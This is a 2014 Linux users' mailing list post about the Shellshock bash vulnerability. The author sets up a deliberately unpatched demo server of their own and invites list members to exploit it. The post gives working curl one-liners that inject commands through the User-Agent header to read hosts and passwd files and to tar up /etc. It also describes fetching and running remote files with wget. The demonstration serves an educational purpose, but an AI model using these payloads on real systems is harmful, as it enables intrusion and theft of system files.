Bottom posting, just because... On 26/09/2014, at 6:01 pm, Steve Holdoway <st...@greengecko.co.nz> wrote:
> On Fri, 2014-09-26 at 17:40 +1200, Chris Hellyar wrote: >> (Sorry long post. :-) >> >> >> php code, run on debian/apache/php, called from my desktop with >> chrome: >> <? system("bash -c set"); ?> >> > [snip] > So following on from my earlier comment that the only people I expect to > see using CGI are developers with aspirations, how does this work with > apache and > > - fastcgi > - SuPHP > > modes, both of which ( ignoring the unbelievable performance hit of the > latter ) will be far more common, and what difference does the > population of disable_functions in php.ini make ( and short_open_tag > lol )? > > Sorry to ask, no apache close by. One shiny, fresh linode apache 2.2.22 on wheezy with fastcgi: (You’ll see whys clean box further down…) http://clug.trash.co.nz/clug_phpinfo.php Default packages, per linode build with one exception, no hardening or config. php code per above, fast cgi. http://clug.trash.co.nz/clug_set.php I didn’t set up suPHP. Does anyone actually use that? And the variation from standard… (which I’m sure you probably guessed) I downgraded the linode standard image with the exploitable bash.. And because I’m a really lousy developer with no idea what I’m doing I put some bash scripted pages online… http://clug.trash.co.nz/cgi-bin/clug.sh As well as the set one: http://clug.trash.co.nz/cgi-bin/clug_set.sh Now to the point of this rather long thread, and the reason I used a clean box.. So folks could play if they are so inclined. To see exactly how simple / bad this issue is…. Previous remote exploits I’ve coded against have taken hours of work and quite a few steps/processes. This one as simple as running this one-liner at the command line: curl -H 'User-Agent: () { :;}; echo; /bin/cat /etc/hosts' http://clug.trash.co.nz/cgi-bin/clug.sh Copy and paste it… You’ll get a copy of the local hosts file. How about: curl -H 'User-Agent: () { :;}; echo; /usr/bin/getent passwd' http://clug.trash.co.nz/cgi-bin/clug.sh Which gives you the local passwd file. But wait.. It gets better… curl -H 'User-Agent: () { :;}; echo; /bin/tar -czf - /etc' http://clug.trash.co.nz/cgi-bin/clug.sh -o out.tgz Will give you a 470k tar ball of everything you can read as the www-data user. Doesn’t take much imagination to see why this is a big problem. You can stick ‘wget’ statements in there, pull a file into /tmp, chmod it, execute it… you get the idea. I’ll leave this box up till the end of the weekend so everyone gets a chance to play…. Please be sensible though.. As you can see it’s not hard to break if you apply a bit of imagination. If you wget stuff, stick it in /tmp and name it. Monday morning after I nuke the box the IP address will be realised and some other random linode customer. Please don’t keep on ‘attacking' it. If anyone would like temp. user on the box to play with this a bit more drop me an email and I’ll create one for you with root access. On the basis that if you break it the others on the list who wanted to play will track you down and beat you with a blunt instrument. Somewhat obviously, if you do want to play with an account on the box don’t do an apt-get upgrade… That’ll kinda defeat the point! semi interesting is to watch the apache logs.. you can see the dodgy entries go past… (tail -f /var/log/apache2/access.log fyi) Cheers, Chris H.
_______________________________________________ Linux-users mailing list Linux-users@lists.canterbury.ac.nz http://lists.canterbury.ac.nz/mailman/listinfo/linux-users